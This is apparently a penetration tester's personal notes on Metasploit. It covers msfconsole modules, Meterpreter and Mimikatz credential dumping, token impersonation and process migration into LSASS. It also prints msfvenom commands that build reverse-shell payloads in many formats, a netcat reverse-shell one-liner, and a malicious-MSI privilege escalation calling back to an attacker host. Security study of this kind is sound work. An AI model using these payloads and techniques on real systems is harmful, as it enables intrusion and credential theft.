Using Metasploit

author: Nathan Acks
date: 2022-04-22

Console (“msfconsole”)

Basic Metasploit flow:

You can use msfconsole as a shell, but there’s no redirect functionality.

Commands

Note that you can also call regular shell commands (ip, ls, etc.) from msfconsole. You can also background processes using Ctrl + Z (Metasploit will trap this, so you don’t have to worry about backgrounding the entire msfconsole).

Modules

Module categories:

Note that Metasploit 6 apparently calls these “framework plugins” now.

Module Options

The common RHOSTS option accepts IP addresses, ranges, CIDR networks, and even a file with one target per line (specify as file:/path/to/file.txt).

Most modules support the ARCH, PAYLOAD, and SESSION options (for specifying target architecture, the payload to deliver, or session number to connect to). However, these are not shown when running show options.

You can reset individual parameters using unset, and reset the entire module using unset all.

Equivalent module commands:

Some exploit modules have a check option which attempts to determine if a target is vulnerable without actually exploiting it. Alternately, other modules have a paired auxiliary scanner. Many don’t have a check at all. YMMV!

Scanners

Use search portscan to display built-in Metasploit port scanners. Note that msfconsole needs to be run as root for many scans to work - just like Nmap. That said, in my experience the fancier TCP scans (for example, SYN) don’t work over a VPN… So maybe best to stick with Nmap.

Targeted scanners can be more useful, however:

Metasploit has a variety of Samba/CIFS scanners too (use search scanner/smb to list them), as well as modules for basic enumeration such as smtp_version/smtp_enum (for SMTP) and mysql_sql (for MySQL, though this seems to just be a thin wrapper around the MySQL command line client).

Payloads

Payloads can be divided into:

Payloads follow the OS/ARCHITECTURE/PAYLOAD (though ARCHITECTURE is not included for 32-bit Windows payloads).

NOTE: Metasploit defaults to sending 32-bit payloads, but an increasing number of things won’t work on a 64-bit system from a 32-bit meterpreter shell. It’s probably best to explicitly set the payload option to use a 64-bit payload unless you know that you’ll be dealing with a 32-bit system.

List all available payloads using msfvenom --list payloads or show payloads from within the Metasploit console.

A specific payload can be set in the Metasploit console use the set PAYLOAD full/path/to/payload.

If you initially get a native shell, use the post/multi/manage/shell_to_meterpreter module to upgrade to Meterpeter. (NOTE: shell_to_meterpreter creates a new connection on a new port, by default 4433.)

Meterpreter

The Meterpreter reverse shell requires a connection back to msfconsole using multi/handler.

Commands

Meterpreter sessions can be backgrounded using the background command, and all sessions can be backgrounded using CTRL + Z. List sessions using the sessions command, and foreground a session using session -i #, where # is the session number.

Modules

Potentially useful Metsploit modules to run from/besides Meterpreter:

NOTE: It is generally more useful to background Meterpreter and then run these commands through the Metasploit console, as within Meterpreter they need to have all options specified on the “run” command line (in the console you can access help, actually see what the options are, etc.).

There seem to be a lot of options for the post/multi/manage/autoroute and auxiliary/server/socks_proxy modules, but I don’t see a way to access them from Meterpreter (it looks like to get help you need to background Meterpreter and use the console).

The advantage of setting up a SOCKS proxy on the target is that you can then use proxychains to route through the target; this can allow you to pivot more deeply into the network that you’re attacking. (You probably want to create a custom proxychains.conf file to do this. Fortunately, /etc/proxychains.conf is well documented.)

Loading PowerShell

load powershell
powershell_shell

Don’t try to exit PowerShell - trying to do this produces consistent hangs for me. Instead, background the process with ^Z.

Using Mimikatz

Use load kiwi to load up Mimikatz. Sub-commands:

kerberos         # Attempt to retrieve kerberos creds
livessp          # Attempt to retrieve livessp creds
mimikatz_command # Run a custom commannd
msv              # Attempt to retrieve msv creds (hashes)
ssp              # Attempt to retrieve ssp creds
tspkg            # Attempt to retrieve tspkg creds
wdigest          # Attempt to retrieve wdigest creds

Log In as a User

load incognito
list_tokens -u
impersonate_token $DOMAIN\\$USER

Not 100% sure where the “tokens” come from here… Mimikatz, maybe?

Process Migration

I think that Meterpreter is being run directly from memory, and what migrate is doing is basically creating a new process using the memory of a different application, hopping to that process, and then shutting down the old process.

Reasons to migrate the Meterpreter process:

In particular, harvesting credentials from LSASS requires that Meterpreter be living in a process with the same permissions (NT AUTHORITY/SYSTEM) and architecture as LSASS; migrating Meterpreter can help us realize this. The print spooler service (spoolsv.exe) is often a good choice, as it runs with elevated permissions, has the same architecture as the system itself, and will restart itself automatically. You can also use lsass.exe directly if you feel like living dangerously.

Another example is that dumping keystrokes will only work when Meterpreter is attached to a word processor or text editor.

Note that Meterpreter will happily let you migrate from a privileged to an unprivileged process - which may cause you to loose control of the target system! Additionally, migrating Meterpreter will change its current working directory to that of the process it’s attaching to.

Venom (“msfvenom”)

Msfvenom is a tool to create custom versions of Metasploit payloads, encoded into a variety of different binary formats and scripts. For example:

# Use Metasploit to generate the code for a remote shell:
# 
msfvenom -p cmd/unix/reverse_netcat \
            lhost=$LOCAL_IP lport=$LOCAL_PORT

# Spin up a listener using netcat:
#
nc -lvp $LOCAL_PORT

This will generates code that looks like this:

mkfifo /tmp/qdsrgu; \
nc $LOCAL_IP $LOCAL_PORT 0</tmp/qdsrgu | \
	/bin/sh >/tmp/qdsrgu 2>&1; \
rm /tmp/qdsrgu

What’s going on here?

Use --list formats to see available encoding formats.

# 32-bit Linux ELF Meterpreter payload
#
msfvenom -p linux/x86/meterpreter/reverse_tcp \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f elf > rev_shell

# 32-bit macOS MACH-O Meterpreter payload
#
msfvenom -p osx/x86/shell_reverse_tcp \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f macho > rev_shell

# 32-bit (?) Windows executable Meterpreter payload
#
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f exe > rev_shell.exe

# PHP Meterpreter payload
#
msfvenom -p php/meterpreter_reverse_tcp \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.php

# ASP Meterpreter payload
#
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f asp > rev_shell.asp

# JSP Meterpreter payload
#
msfvenom -p java/jsp_shell_reverse_tcp \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.jsp

# Python Meterpreter payload
#
msfvenom -p cmd/unix/reverse_python \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.py

# Bash Meterpreter payload
#
msfvenom -p cmd/unix/reverse_bash \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.sh

# Perl Meterpreter payload
#
msfvenom -p cmd/unix/reverse_perl \
LHOST=$LOCAL_IP LPORT=$LOCAL_PORT -f raw > rev_shell.pl

System-specific shell codes can also be produced by appropriately varying the -f option.

32-Bit Windows Programs

By default, msfvenom produces 64-bit executables when using the -f exe. This doesn’t work, however, if you’re trying to replace a program in Program Files (x86). In this case, you’ll need to explicitly instruct msfvenom to encode a 32-bit binary using -e x86/shikata_ga_nai.

Malicious MSI Files

If AlwaysInstallElevated is set to 1 under both of the following registry keys, then MSI installers will run as SYSTEM.

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate a malicious MSI file with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
		-f msi -o $INSTALLER.msi

Then install on the target to get a shell:

msiexec /quiet /qn /i $INSTALLER.msi

Catching Shells

Use the exploit/multi/handler module in Metasploit to catch the shells produced using Msfvenom (note that you’ll need to use set payload to tell Metasploit what it’s catching!). We can catch both regular reverse shells and Meterpreter sessions this way.